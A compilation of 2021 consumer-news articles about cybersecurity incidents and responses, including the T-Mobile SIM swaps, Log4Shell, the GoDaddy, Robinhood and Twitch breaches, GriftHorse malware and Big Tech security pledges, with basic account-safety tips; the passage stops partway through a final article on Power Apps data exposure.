2021 Cybersecurity

Hackers had another field day at T-Mobile, or so it appears. After a massive data breach compromised the accounts of six million users in August, the T-Mo Report is citing internal documents that show the company uncovered “unauthorized activity” on some customer accounts. 

The organization said the activity was most likely either the viewing of customer proprietary network information (CPNI), an active SIM (subscriber identity module) swap by a malicious actor, or possibly both.

If it was CPNI, then the hackers could have taken advantage of a customer’s account name, phone number, rate plan, and more. “That’s not great, but it’s much less of an impact than the breach back in August had, which leaked customer social security numbers,” T-Mo said. 

On the other hand, if it was a SIM swap, things could be worse. Hackers could gain control of a customer’s phone number. In that situation, it could lead to the victim’s other online accounts being accessed via two-factor authentication codes sent to their phone number, T-Mo said. However, the document shared with T-Mo indicated that anyone affected by a SIM swap had lucked out and that action was reversed.

T-Mobile responds

When ConsumerAffairs asked T-Mobile for a comment about the breach, the company confirmed the issue and said that it has corrected it.

“We were informed [by] a very small number of customers that the SIM card assigned to a mobile number on their account may have been illegally reassigned or limited account information was viewed. Unauthorized SIM swaps are unfortunately a common industry-wide occurrence, however this issue was quickly corrected by our team, using our in-place safeguards, and we proactively took additional protective measures on their behalf,” a company spokesperson said in an email.

In addition, T-Mobile Help responded to a question posted on Twitter by saying that it was “taking immediate steps to help protect all individuals who may be at risk from this cyberattack.” It followed by saying users could send it a direct message to discuss steps to increase account security.

T-Mo also reported that customers who notified T-Mobile of unauthorized activity on their account have had notes added to their account for reps to see when accessing them.

Meta has encountered its first major headache under its new moniker. The company formerly known as Facebook has notified 50,000 global users of Facebook, WhatsApp, Instagram, and Messenger that they may have been targeted by private surveillance companies. 

Meta said those seven firms carried out a mix of “reconnaissance, engagement, and exploitation,” but they have now been completely barred from the company’s platforms.

Collecting information and compromising accounts

In a blog post describing the issue, Meta said the global “surveillance-for-hire” companies targeted people to collect intelligence and compromise their devices and accounts – not only on Meta’s platforms but across the whole internet in more than 100 countries.

“While these ‘cyber mercenaries’ often claim that their services only target criminals and terrorists, our months-long investigation concluded that targeting is in fact indiscriminate and includes journalists, dissidents, critics of authoritarian regimes, families of opposition and human rights activists,” explained Meta officials David Agranovich and Mike Dvilyanski.

Agranovich and Dvilyanski said Meta is trying to prevent this from happening again by sharing its findings with security researchers, other platforms, and policymakers. The company also issued cease and desist warnings to the companies involved and alerted people who may have been targeted to help them strengthen the security of their various Meta-connected accounts.

What actual good could come out of this

Despite the immediate concern, Meta said in its threat report that there’s actually some good that can come out of this situation. The company is requesting that governments and tech companies come together to work on three key components:

Greater transparency and oversight: Meta sees a need for more international oversight that establishes transparency and “know your customer” standards. These standards would cover social platforms and surveillance-for-hire entities so that they are held accountable.

Industry collaboration: Surveillance efforts show up differently depending on individual platforms, but Meta stated that industry-wide collaboration is critical if Big Tech wants to fully understand and stop adversarial surveillance efforts before they spin out of control.

Governance and ethics: While Facebook’s history is covered with faux pas that put the company’s trustworthiness in question at congressional hearings, Meta says it now welcomes domestic and international efforts to raise accountability through legislation, export controls, and regulatory actions. 

“We also encourage broader conversations about the ethics of using these surveillance technologies by law enforcement and private companies, as well as creating effective victim protection regimes,” Agranovich and Dvilyanski said.

If you find things a little squirrely with the internet as you begin your week, it may relate to a “zero-day” exploit called “Log4Shell” that has sent security experts scrambling. 

The vulnerability is a critical security flaw in an open-source logging software called “Log4j,” which is used by countless companies and data centers around the world. The difficult part is that when analysts attempt to plug holes created by Log4Shell, others seem to pop up as a result.

“The internet’s on fire right now,” Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike, told The Associated Press. “People are scrambling to patch,” he said, “and all kinds of people scrambling to exploit it.”

Why it’s such a threat

Log4Shell appears to be a major threat to internet companies. Reports have already circulated that iCloud, Amazon’s cloud service AWS, and Minecraft were targeted by hackers who used the vulnerability.

Hackers who use Log4Shell are reportedly able to run code inside of server systems and remotely take full control. Making the situation far more dangerous is the fact that this hack doesn’t require any interaction from the victim. Hackers can simply worm their way, gain access, and do their damage.

“This is far worse than if individual devices were vulnerable, and I think it's an open question at this point exactly what kind of data attackers are probably pulling from Apple's services as we speak,” Thomas Reed, Malwarebytes director of Mac offerings, told Ars Technica.

“I’d be hard-pressed to think of a company that’s not at risk,” Joe Sullivan, a Cloudflare security officer, told the AP. He said that untold millions of servers might have the utility installed. 

In its latest move to stop global hackers in their tracks, Microsoft’s Digital Crimes Unit (DCU) has throttled the activities of a China-based hacking group that it calls Nickel. 

A federal court in Virginia granted the company’s request to seize websites that Nickel planned to use to attack organizations in 29 countries, including the U.S. The upshot of Microsoft’s sheriff-like effort is that Nickel’s access to victims has been cut off and that the malicious websites it was using no longer have the ability to carry out attacks. 

Microsoft didn’t name Nickel’s specific targets but said at the top of the list of those spared were government agencies, think tanks, and human rights organizations because of the wealth of information the hackers could tap into for intelligence gathering. 

“There is often a correlation between Nickel’s targets and China’s geopolitical interests,” said Tom Burt, Microsoft’s Corporate Vice President, Customer Security & Trust. According to Burt, Nickel also targeted diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe, and Africa. 

Microsoft says it will remain relentless

Nickel may be the latest snake in the grass that Microsoft has gone after, but it’s not the first. The company said that DCU’s pioneering efforts have taken control of more than 10,000 malicious websites used by cybercriminals and nearly 600 sites used by nation-state actors so far. The tech giant said it has also proactively blocked the registration of some 600,000 sites to prevent hacking groups from using them to cause harm in the future.

However, Microsoft admitted that Nickel was not completely killed off, and it could come back for more. “Our disruption will not prevent Nickel from continuing other hacking activities, but we do believe we have removed a key piece of the infrastructure the group has been relying on for this latest wave of attacks,” Burt remarked.

He went on to say that nation-state attacks continue to proliferate in number and sophistication. While China may be the head of the Nickel snake, DCU has also disrupted nefarious attempts from Iran, Russia, and North Korea. 

“Our goal … is to take down malicious infrastructure, better understand actor tactics, protect our customers and inform the broader debate on acceptable norms in cyberspace. We will remain relentless in our efforts to improve the security of the ecosystem and we will continue to share activity we see, regardless of where it originates,” Burt concluded.

In a data breach alert published by the Securities and Exchange Commission (SEC), GoDaddy reported that the private data of as many as 1.2 million of its customers was exposed by hackers who wormed their way into the company's Managed WordPress hosting ecosystem.

Unfortunately, GoDaddy was a little late in putting measures in place to curb the incident. The company told the SEC that it determined hackers first breached their systems on September 6, 2021, but that it didn’t take measures to block the hackers until November 17.

What happened

Demetrius Comes, GoDaddy’s Chief Information Security Officer, said the hack was pretty straightforward. Using a compromised password, the hackers accessed the provisioning system in GoDaddy’s code base for Managed WordPress. Managed WordPress hosting is something GoDaddy offers its clients -- sort of a jack of all trades platform where all the technical aspects of running a website are handled by GoDaddy, freeing the website owner from having to take care of those things.

When the company first spotted the hack, it immediately began an investigation with the assistance of an IT forensics firm. Comes said GoDaddy also contacted law enforcement. 

“Upon identifying this incident, we immediately blocked the unauthorized third party from our system. … Our investigation is ongoing,” Comes said. As to what the hackers had access to, he offered the following: 

• Up to 1.2 million active and inactive Managed WordPress customers had their email addresses and customer numbers exposed. The exposure of email addresses is serious because it presents a risk of phishing attacks.

• The original WordPress Admin password that was set at the time of provisioning was exposed. If those credentials were still in use, GoDaddy reset those passwords.

• For active customers, FTP and database usernames and passwords were exposed. GoDaddy says it reset both passwords.

• For a subset of active customers, the SSL private key was exposed. Comes said the company is in the process of issuing and installing new certificates for those customers.

Are you a GoDaddy customer?

Comes said the company is in the process of contacting everyone who was impacted directly by the hack. However, he stated that customers can also contact GoDaddy via its help center.

“We are sincerely sorry for this incident and the concern it causes for our customers. We, GoDaddy leadership and employees, take our responsibility to protect our customers’ data very seriously and never want to let them down,” Comes said in closing. “We will learn from this incident and are already taking steps to strengthen our provisioning system with additional layers of protection.”

Robinhood, the trading app comprised of users who drove this year’s Reddit stock craze, reports that it has suffered a data breach in which the names and email addresses of millions of traders were stolen. In a blog post, the company emphasized that no Social Security or bank account numbers were compromised, and none of its users suffered any financial loss.

The company said the hacker gained access to Robinhood’s network systems by impersonating an authorized party to a customer-support employee on the phone. Officials said the breach was discovered late Wednesday of last week and quickly contained.

Robinhood said the hacker demanded a ransom payment at one point, but the case was turned over to law enforcement to handle. The company also retained the services of Mandiant, a cybersecurity firm.

“As a Safety First company, we owe it to our customers to be transparent and act with integrity,” said Robinhood chief security officer Caleb Sima. “Following a diligent review, putting the entire Robinhood community on notice of this incident now is the right thing to do.” 

5 million email addresses

The company says an investigation into the hack shows that the hacker was able to steal a list of email addresses for approximately five million users, as well as full names for a different group of approximately two million people. 

Robinhood also believes the hackers gained more extensive data on about 310 users. Again, it doesn’t think any financial information was compromised, but hackers may have gained access to names, dates of birth, and zip codes for that small group of customers.

Robinhood gained millions of customers during the pandemic when homebound Americans used its app to trade stocks, in many cases driving up the price of so-called “meme” stocks like Gamestop and AMC.

Disruptive force

The company has been a disruptive force in the financial services industry by not charging commissions on trades. Now, nearly all online trading platforms have done away with commissions on stock trades.

Robinhood customers seeking information on how to keep accounts secure can visit Help Center, then tab through My Account & Login and Account Security. 

When in doubt, users may log in to view messages from the company. It also points out that it will never include a link to access a user’s account in a security alert. 

Foreign hackers are suspected to have forced their way through the computer systems of nine organizations in the defense, education, energy, health care, and technology sectors. Those organizations are spread throughout the world, but according to findings that security firm Palo Alto Networks shared with CNN, at least one is in the U.S. 

Security analysts believe the hackers are set on stealing key data from U.S. defense contractors and other sensitive targets. The hackers reportedly targeted organizations with passwords that could provide ongoing access to government networks. 

Ryan Olson, a senior Palo Alto Networks executive, told CNN that it was sort of a race to the finish. Once the intruders laid their hands on the passwords, it’s possible that they would be in a good position to intercept sensitive data sent via email or stored on computer systems.

NSA and U.S. Cybersecurity and Infrastructure Security Agency (CISA) officials said they are tracking the threat. 

Eyes on China

Olson said the nine confirmed targets are the "tip of the spear" of the surveillance campaign, and he expects that even more victims will be revealed. Olson couldn’t lay blame at any particular group’s feet, but he said some of the tactics the hackers employed are similar to those used by a known Chinese hacking group.

China state hackers have been behind a number of cyberattacks over the course of the last year. Just this summer, France claimed that China state hackers were using compromised routers in a massive attack campaign. The Biden administration also accused China of being behind major cyberattacks like the Microsoft Exchange hack. 

In July, a federal grand jury charged four nationals and residents of the People’s Republic of China with a campaign to hack into the computer systems of dozens of victim companies, universities, and government entities in the U.S. and abroad. In October, the Federal Communications Commission (FCC) recognized potential security risks connected to China Telecom and banished the company from the U.S. 

People who have shied away from Facebook over privacy issues will be happy to know that it’s shutting down its facial recognition system. The company announced that the recognition technology that automatically recognized when a member appears in a photo is officially going away…for now.

Facebook’s active daily users who had previously opted into allowing the technology won’t have to lift a finger; they’ll simply no longer be automatically recognized in photos and videos on the platform. The company said it’s not going to archive anything it has in its system. It will delete more than a billion people’s individual facial recognition templates. 

Facebook users who were hoping to continue using the facial recognition technology to see suggested tags with their names in photos and videos are out of luck. The company says those people will have to tag posts the old-fashioned way -- manually. 

“We need to weigh the positive use cases for facial recognition against growing societal concerns, especially as regulators have yet to provide clear rules,” Jerome Pesenti, VP of Artificial Intelligence, said in a blog post.

The change will likely save Facebook some money in the long run. Over the past few years, the company ran afoul of its users when it launched its '10-Year Challenge'  promotion, and it has forked over hundreds of millions of dollars to settle facial recognition lawsuits.

One of the largest shifts in facial recognition history

Pesenti said Facebook’s move is momentous on a privacy level and represents one of the largest shifts in facial recognition usage in the technology’s history. 

However, the company still believes that facial recognition has a place in the world -- like at airports where the Department of Homeland Security uses facial recognition to identify people wearing face masks because of the pandemic. Because of that, it left the door slightly ajar for using the technology again on some level in the future.

“Looking ahead, we still see facial recognition technology as a powerful tool, for example, for people needing to verify their identity, or to prevent fraud and impersonation,” Pesenti said. “We believe facial recognition can help for products like these with privacy, transparency and control in place, so you decide if and how your face is used. We will continue working on these technologies and engaging outside experts.”

As of December 26, 2021, China Telecom Americas will no longer be doing business in the U.S. Citing security concerns, the Federal Communications Commission (FCC) issued an order on Tuesday that prevents China Telecom from providing any domestic or international services in the U.S.

The move is a major blow for China Telecom because its mobile virtual network in the U.S. includes more than 4 million Chinese Americans, 2 million Chinese tourists a year visiting the United States, 300,000 Chinese students at American colleges, and more than 1,500 Chinese businesses.

However, it wasn’t completely unexpected. In 2020, the Executive Branch warned that it was considering shutting down the U.S. operations of state-controlled Chinese telecommunications companies, including China Telecom Americas. 

Officials had offered China Telecom a chance to disprove the agency’s findings, and they established a process that allowed for China Telecom, the U.S. Executive Branch agencies, and the public to present any remaining arguments or evidence regarding the matter.  

“The Federal Communications Commission has a long history of working to open American markets to foreign telecommunications companies when doing so is in the public interest,” Chairwoman Jessica Rosenworcel said.  

“These connections can make us stronger because they help share our democratic values with the rest of the world.  But we also recognize not every connection is consistent with the national security interest of the United States. That’s because some countries may seek to exploit our openness to advance their own national interests.  When we recognize this is the case and cannot mitigate the risk, we need to take action to protect the communications infrastructure that is so critical to our national security and economic prosperity.”

FCC offers to help China Telecom’s U.S. users

Fortunately for China Telecom’s U.S. users, the FCC is not leaving them out in the cold. The agency said it will help customers transition to other mobile service providers. Officials say they will issue a guide that outlines what other options consumers might consider for mobile services.  

This document will be available in English, Simplified Chinese, and Traditional Chinese and made available on the FCC’s website. 

Cybersecurity specialists at the Microsoft Threat Intelligence Center (MSTIC) claim that the Russian-linked hacking group behind the attacks on SolarWinds, JBS, and others last year is at it again -- this time going after key players in the global technology supply chain.

The group, known as Nobelium, has “been attempting to replicate the approach it has used in past attacks by targeting organizations integral to the global IT supply chain” according to Tom Burt, Microsoft’s corporate vice president of customer security and trust. So far, the group has allegedly targeted more than 140 IT resellers and service providers and compromised as many as 14 since May. 

“Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling … targets of interest to the Russian government,” Burt said in a blog post.

Hackers use "password spraying" technique

The hackers’ favorite technique this time around is reportedly something called a “password spray.” This attack is a procedure that tries to access a vast number of account usernames via commonly used passwords such as “123456789,” “Password123,” and “picture1.”

DoubleOctopus -- a cybersecurity company focused on password protection -- says even though password spraying is a slow-and-go technique, it does allow hackers to stay undetected by avoiding rapid or frequent account lockouts. That makes it different from traditional attacks that attempt to gain unauthorized access by guessing an account’s password.

In this situation, online users appear to be at the mercy of the service providers and platforms they use to protect their accounts. To that end, Microsoft recommends that companies with online customer systems implement a specific set of protocols to thwart recent Nobelium activity.

Putting protective measures in place

While consumers may need to depend on companies to protect them to some extent, there are still some things they can do to gain an advantage against hackers. In an interview with USAToday, Craig Danuloff, CEO of The Privacy Co., offered these tips to make personal passwords and information less susceptible:

Do not reuse passwords on any important accounts. Keeping your passwords unique helps ensure that hackers can’t access all of your important accounts if they figure out just one of your passwords.

Use two-factor authentication wherever possible. Amazon, Apple, Google, and other major tech players use this method because it works well. Here’s a guide that goes over two-factor authentication and other cybersecurity steps you can take to protect yourself.

Choose platforms that use end-to-end encryption. This is a method that Zoom now uses after learning a valuable lesson without it. “Files or photos sitting in cloud storage can be stolen,” Danuloff said. “If they’re in a database that has no keys or just one master key, all of your personal data has a much higher likelihood of being stolen, accessed, and maybe even shared publicly.”

Don’t give up your data to every site that asks for it. “Data that isn’t there can’t be stolen,” Danuloff said. All kinds of services ask for your address, phone number, or even your Social Security number. “The vast majority of them don’t need it,” he said. So give them “alternative facts.” Use burner email accounts. 

Use a personal monitoring service -- aka ID theft protection -- that informs you when your data has been stolen in a hack or when there are signs of identity theft. 

October is turning out to be a bad month for cryptocurrency lawbreakers. On Thursday, the U.S. Department of Justice announced that it has created a special team of its own to keep criminal misuses of cryptocurrency to a minimum. 

In the agency’s announcement, Deputy Attorney General Lisa O. Monaco said the National Cryptocurrency Enforcement Team (NCET) will not only tackle thorny investigations and prosecutions of criminal misuses of cryptocurrency. She said it will also be especially vigilant regarding crimes committed by virtual currency exchanges, mixing and tumbling services, and money laundering. 

The new team will also assist in tracing and recovery of assets lost to fraud and extortion, including cryptocurrency payments to ransomware groups, such as the one involved in the Colonial Pipeline attack earlier this year.

“Today we are launching the National Cryptocurrency Enforcement Team to draw on the Department’s cyber and money laundering expertise to strengthen our capacity to dismantle the financial entities that enable criminal actors to flourish — and quite frankly to profit — from abusing cryptocurrency platforms” said Monaco. “As the technology advances, so too must the Department evolve with it so that we’re poised to root out abuse on these platforms and ensure user confidence in these systems.”

Diving deep to find crypto criminals

The NCET realizes that the people behind cryptocurrency crimes can be sneaky, often doing their deeds in what the agency called “dark markets” -- the underbelly of the internet where illegal drugs, weapons, hacking tools, and malware are sold. To get to those people, the DOJ will use the expertise of the Criminal Division to “deter, disrupt, investigate, and prosecute criminal misuse of cryptocurrency, as well as to recover the illicit proceeds of those crimes whenever possible.”

Because those dark markets and bad actors are difficult to find and bring to justice, the NCET said it will foster the development of a higher level of expertise in cryptocurrency and blockchain technologies across all aspects of the Department’s work. 

The DOJ said it isn’t just doing this on a national scale. The new group said it will be providing support to international, federal, state, local, tribal, and territorial law enforcement authorities that are grappling with these new technologies and new forms of criminal tradecraft.

Twitch -- Amazon’s streaming service that’s focused on live video game broadcasts -- has experienced a massive data breach. The hacker responsible for the act says they have taken all the information they found on Twitch, including source code and user payout data, and leaked it online.

The anonymous hacker went further, posting a link to its bounty to 4chan on Wednesday and stating that their reason for leaking their stolen goods was to “foster more disruption and competition in the online video streaming space” because Twitch’s “community is a disgusting toxic cesspool.”

VideoGamesConsole (VGC), which first reported the hack, verified the leak as legitimate and that the files mentioned on 4chan are publicly available to download.

What to do

VGC advises anyone who uses Twitch to change their password and turn on two-factor authentication immediately. To change your password on Twitch, users can do the following::

• Go to Twitch and log on with your existing username and password.

• Click on your avatar in the top-right corner and choose Settings.

• Go to the Security and Privacy option, locate the option that says “change password,” and complete the prompts to do so. 

VGC recommends that users opt for a longer password when making the change because they tend to be safer. Adding both uppercase and lowercase characters, numbers, and a special symbol or two (like $ or &) can make them even stronger.

Google has put 2 billion Chrome users on high alert that its browser has suffered “zero-day” exploits that “exist in the wild” and affect Apple, Linux, and Windows systems. This is the ninth such attack so far this year.

In order to buy itself some extra time so users can upgrade to a safer version of Chrome, Google’s Srinivas Sista said the company is limiting access to bug details and links “until a majority of users are updated with a fix.” 

What Chrome users need to do ASAP

To get ahead of the situation for the short term, Google has released a critical update. Gordon Kelly, a Consumer Tech specialist at Forbes, says the company tends to roll out updates in a staggered fashion, so not everyone will get the notice at the same time. 

To check if you are protected, you can take these steps:

• Click on the vertical three-dot icon in the upper right-hand part of your Chrome browser.

• Then, go to Settings > Help > About Google Chrome.

• If your Chrome version is 94.0.4606.71 or higher, then consider yourself safe. If your version is below that number, make it a point to check at least once a day to see if there’s an upgrade.

• If the update is not yet available for your browser, check regularly for the new version.

Are there safer browsers than Chrome?

One of the reasons many people use Chrome is because the integration between Google Docs, YouTube, Google Drive, Google Calendar, G-Mail, their Android devices, etc. makes things easier. But cybersecurity watcher Zak Doffman says Google’s latest issue should give users some serious pause.

“If you’re one of those users, this nasty new surprise just gave you a reason to quit,” he wrote following the announcement of the latest Chrome issue.

Do consumers have other decent choices? Doffman says yes. There’s Apple’s Safari, DuckDuckGo, Mozilla Firefox, and a fairly new browser called Brave. Each of those browsers tries to upset Google’s apple cart by placing an extra emphasis on privacy. In Brave’s case, it automatically blocks both ads and website trackers as part of its default settings. 

Even though Google announced it was phasing out third-party tracking cookies in its Chrome browser earlier this year, Doffman is still championing a different browser. 

“While it’s Firefox, DuckDuckGo and Brave that most vocally push the browser privacy agenda, it’s really Safari that has done the best job of exposing Chrome’s avaricious data harvesting machine at scale,” he wrote.

Even though much of Apple’s recent press has been about its new iPhones, Doffman says the company’s recent Safari update is a “genuine game changer” for privacy and security because of the addition of a new privacy weapon called Private Relay. 

“Put simply, this breaks the identity chain between you, the websites you visit and the ISP through which you access the internet,” he explained.

Neiman Marcus has alerted customers that a data breach last year may have exposed the payment records of 4.6 million customers.

The personal information for affected customers may have included names and contact information; payment card numbers and expiration dates but without CVV numbers; Neiman Marcus virtual gift card numbers without PINs; and usernames, passwords, and security questions and answers associated with Neiman Marcus online accounts. 

The company said it has alerted law enforcement and retained the services of a cybersecurity firm to investigate. The preliminary investigation shows that around 3.1 million payment and virtual gift cards were exposed, but the vast majority -- more than 85% -- were expired. 

The company said no active Neiman Marcus-branded credit cards were exposed and that there is no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.

"At Neiman Marcus Group (NMG), customers are our top priority," said Geoffroy van Raemdonck, the company’s CEO. "We are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information."

Incident occurred 17 months ago

The breach is believed to have occurred in May 2020, but the company only learned of it in recent days. Once it was aware that payment records had been exposed, the company said it began steps to protect customers.

The company required an online account password reset for affected customers who had not changed their password since May 2020. It also set up a call center to answer customers’ questions. The number is (866) 571-9725, and it is open Monday through Friday, 8 a.m. to 10 p.m. CST; Saturday and Sunday, 10 a.m. to 7 p.m. CST. Callers should be prepared to provide engagement number B019206. There’s also a webpage that provides additional information.

Cyberattacks on corporate entities have become more common in the last five years. Corporations are major targets for hackers. Earlier this year, a ransomware attack shut down a major gasoline pipeline.

A team of security researchers has uncovered a new hack that could allow bad actors to make unauthorized charges through victims’ iPhones. 

In a demonstration to the BBC, researchers from the Computer Science departments of Birmingham and Surrey Universities in the U.K. showed how cyber thieves can exploit a feature in Apple Pay that could leverage unauthorized contactless payments. According to the researchers, the problem lies in how Visa cards are set up in “Express Transit” mode in an iPhone's wallet. 

Express Transit is an Apple Pay feature that enables commuters to make quick contactless payments without having to unlock their phone. It’s similar to how a commuter might pay for a ride on New York City’s MTA, Los Angeles’ TAP, or Chicago’s CTA. 

How it works

In the demo, researchers showed how easy it was for them to make a Visa payment of £1,000 [$13,460 USD] without unlocking the phone or authorizing the payment. 

All a hacker has to do is set up a commercially available piece of radio equipment near where the iPhone might be used to make a payment, such as a retail store. The hacker can then trick the iPhone into thinking it’s dealing with a legitimate point-of-contact. 

The scary thing is that the crook’s phone and the payment terminal that’s being used don't need to be anywhere near the victim's iPhone. "It can be on another continent from the iPhone as long as there's an internet connection," said Dr. Ioana Boureanu of the University of Surrey.

Apple and Visa aren’t worried...yet

While the researchers may think the incursion is a real possibility, neither Apple nor Visa are sweating it quite yet. According to the BBC, Apple said the matter was "a concern with a Visa system.” Visa said its payments were secure and attacks of this type were impractical outside of a lab.

Visa told the BBC that it took all security threats seriously, but it says this isn’t something that consumers should worry about. 

"Visa cards connected to Apple Pay Express Transit are secure, and cardholders should continue to use them with confidence,” the company said. "Variations of contactless fraud schemes have been studied in laboratory settings for more than a decade and have proven to be impractical to execute at scale in the real world".

Protecting yourself

Regardless of whether this particular threat is viable, there are things consumers can do to lessen the chances of being victimized by a hacker trying to create unauthorized payments. First off, if you lose your phone, you can use Apple's iCloud to block Apple Pay or wipe the phone. You can also alert Visa and block any future payments.

"In the unlikely event that an unauthorised payment does occur, Visa has made it clear that their cardholders are protected by Visa's zero liability policy,” Apple said.

Android phone owners got an unpleasant surprise on Tuesday. Researchers at mobile security company Zimperium reported the discovery of a piece of malware called “GriftHorse” -- a trojan that’s been unleashed on more than 10 million Android devices in 70+ countries. 

This isn’t your ordinary household malware. Its mission is to sucker users into permissions that allow the cybercrooks to force monthly premium service charges. Business is good, too. So far, researchers estimate that the GriftHorse mob is making between $1.5 million to $4 million per month.

Where trouble ensues

Zimperium’s zLabs team said the malware is delivered to consumers by malicious Android apps that appear harmless at first. However, chaos ensues after the apps hoodwink users into granting certain permissions. At that point, victims start getting charged every month for premium paid services that they get subscribed to without their knowledge or consent. 

“Upon infection, the victim is bombarded with alerts on the screen letting them know they had won a prize and needed to claim it immediately. These pop ups reappear no less than five times per hour until the application user successfully accepts the offer. Upon accepting the invitation for the prize, the malware redirects the victim to a geo-specific webpage where they are asked to submit their phone numbers for verification,” Zimperium’s Aazim Yaswant and Nipun Gupta explained.

“But in reality, they are submitting their phone number to a premium SMS service that would start charging their phone bill over €30 [$40 USD] per month. The victim does not immediately notice the impact of the theft, and the likelihood of it continuing for months before detection is high, with little to no recourse to get one’s money back.”

Zimperium warned Google about the threat, and the company responded by verifying and removing the malware apps from its Play Store. However, the malicious applications might still be available on unsecured third-party app repositories or on an Android user’s phone. To help users identify the problem-causing apps, Zimperium offers a full list of the affected apps here.

Microsoft has issued a security alert to Windows users, warning that hackers have found and are currently exploiting a vulnerability in the operating system.

“Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows,” the company reported. “Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.”

The company said the hackers were likely to target victims through their use of Office documents. If users open a malicious document, they’ll end up with malware on their system.

The best way to protect yourself is to make sure your antivirus software is up to date. Microsoft said Microsoft Defender Antivirus and Microsoft Defender for Endpoint can effectively detect the vulnerability. Meanwhile, the company said it is investigating the source.

Investigation underway

“Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers,” the company said. “This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.”

Krebs on Security, an authoritative security blog, reports Microsoft has not yet released a patch for the flaw, but it says users can mitigate the threat by disabling the installation of all ActiveX controls in Internet Explorer. Krebs says the vulnerability is currently being used in targeted attacks on both PCs and servers.

An FBI terrorist watchlist containing 1.9 million records mistakenly found its way onto the internet unguarded, allowing anyone and everyone to view it.

Volodymyr "Bob" Diachenko, Comparitech’s Head of Security Research, is the person who first stumbled onto the treasure trove. In sharing the details of his find, he said the watchlist came from the Terrorist Screening Center (TSC), a multi-agency group administered by the FBI -- the same agency that’s in charge of the U.S.’ no-fly list. 

Stopped in its tracks

Donning his white hat, Diachenko said he immediately reported the leak to Department of Homeland Security (DHS) officials before he went any further. He said DHS acknowledged the incident and thanked him for his efforts. However, the agency did not provide any further official comment.

Diachenko said a typical record in the list contained these details:

• Full name

• TSC watchlist ID

• Citizenship

• Gender

• Date of birth

• Passport number

• Country of issuance

• No-fly indicator

The name alone -- terrorist watchlist -- sounds ominous, and it is. According to PCMag’s investigation of the situation, the list consists of people who are suspected of terrorism but who have not necessarily been charged with any crime yet. 

“In the wrong hands, this list could be used to oppress, harass, or persecute people on the list and their families. It could cause any number of personal and professional problems for innocent people whose names are included in the list,” reported Matthew Humphries.

One of those "personal problems" made headlines in 2017 when consumers misidentified as terrorists won a $60 million verdict against TransUnion when it misidentified them in their credit reports as terrorists and drug traffickers. 

Could this happen to you?

The no-fly list has proven to be a double-edged sword. While the FBI can justify its reasons, the American Civil Liberties Union (ACLU) has long found fault with the list because people placed on it aren’t always notified. 

Could something like this happen to anyone? The short answer is yes. As an example, infants have been prevented from boarding planes at airports across the U.S. because their names happened to be the same as, or similar to, those of possible terrorists on the government's ''no-fly list."

The ACLU says both U.S. citizens and “lawful permanent residents” have rights that the DHS and TSC are supposed to review before any action is taken. The ACLU offers tips to anyone who is mistakenly caught in the no-fly snare. A complete list of dos and don’ts is available here.

There’s barely a week that goes by without a high-profile cybersecurity incident. Not only do these scourges affect everyday life for businesses, but consumers are also impacted as hackers go after any amount of personal data they can access.

In a face-to-face meeting with President Biden on Wednesday, Big Tech stalwarts Amazon, Apple, Google, IBM, and Microsoft all agreed to write big, fat checks to help the nation as a whole address the rising tide of cybersecurity threats. The companies also plan to address the ever-widening abyss of high-growth jobs in the tech sector. 

Spending billions to shore up cybersecurity

Here’s what Big Tech told President Biden they’ll commit to:

Google says it’s good for $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance security. The company also promised to assist 100,000 Americans in earning industry-recognized digital skills certificates. 

Apple announced that it will create a new program -- one that includes more than 9,000 U.S. suppliers -- to drive continuous security improvements throughout the technology supply chain. 

Another plus for tech education came from IBM, which announced that it will train 150,000 people in cybersecurity skills over the next three years. The company will place a special focus on historically Black colleges and universities to create “Cybersecurity Leadership Centers” in an effort to grow a more diverse cyber workforce.

Microsoft -- which has been on the wrong end of some serious hacks this year -- announced that it will invest $20 billion between now and 2026 to up the ante on cybersecurity both by design and in delivery throughout its systems. To prime the pump, the company said it will immediately make available $150 million in technical services to help federal, state, and local governments upgrade their current security protection. It will also invest heavily in tech training by expanding partnerships with community colleges and non-profits.

For its part, Amazon said it will make the same security awareness training it offers its employees freely available. It also plans to offer a free multi-factor authentication device to protect against cybersecurity threats like phishing and password theft to all of its Amazon Web Services account holders. Those account holders include companies like Facebook, Netflix, Adobe, ESPN, Ticketmaster, Samsung, and Disney.

Increasing tech education and jobs

One huge challenge facing these Big Tech companies is that nearly half a million cybersecurity jobs remain unfilled. A spokesperson at the Computing Technology Industry Association (CompTIA) told ConsumerAffairs that, as of this week, it was tracking 454,366 job ads for cybersecurity in the U.S. -- 13% more than the year before.

The education effort isn’t being carried solely by Big Tech. To get people trained quickly, colleges and organizations are investing heavily in “micro-credentialing” and training that doesn’t call for a four-year college degree. To that end, Girls Who Code announced that it will establish a micro-credentialing program for historically excluded groups.

The University of Texas System told the White House it will make available entry-level cyber educational programs through UT San Antonio’s Cybersecurity Manufacturing Innovation Institute to help grow new short-term credentials in cyber-related fields by more than 1 million workers.

“To meet the scale of the demand for cybersecurity skills, we need to be considering creative alternatives to the classic college pathway into the profession. The majority of cyber jobs don’t require a four-years computer science degree,” Todd Thibodeaux, president and CEO at CompTIA, told ConsumerAffairs.

“We can have people come through community college programs, through for-profit university programs, through online university programs, through paid apprenticeships and through industry certification programs that can be completed in a matter of months to accelerate this process.”

If there’s any doubt that a tech education can pay off, recent data shows that tech professionals in 9 of the 10 top-paying U.S. states make over 70% more than the average worker. Life as a techie in places like Alabama pays off especially well. The average salary for someone in technology in Alabama is $86,720 a year -- 85% higher than the $46,840 that salary workers in other fields in the state bring home.

According to researchers, an estimated 38 million records from more than 1,000 apps that use Microsoft's Power Apps portals platform have been exposed. Those records are not only jam-packed with the typical personal data like phone numbers and addresses, but it also includes data from COVID-19 contact tracing efforts, vaccine registrations, and employee databases.

The security leak also reportedly exposed data from large companies and agencies alike, including Ford, American Airlines, logistics company JB Hunt, the Indiana Department of Health, and New York City public schools, according to Wired magazine. 

Caught in the nick of time

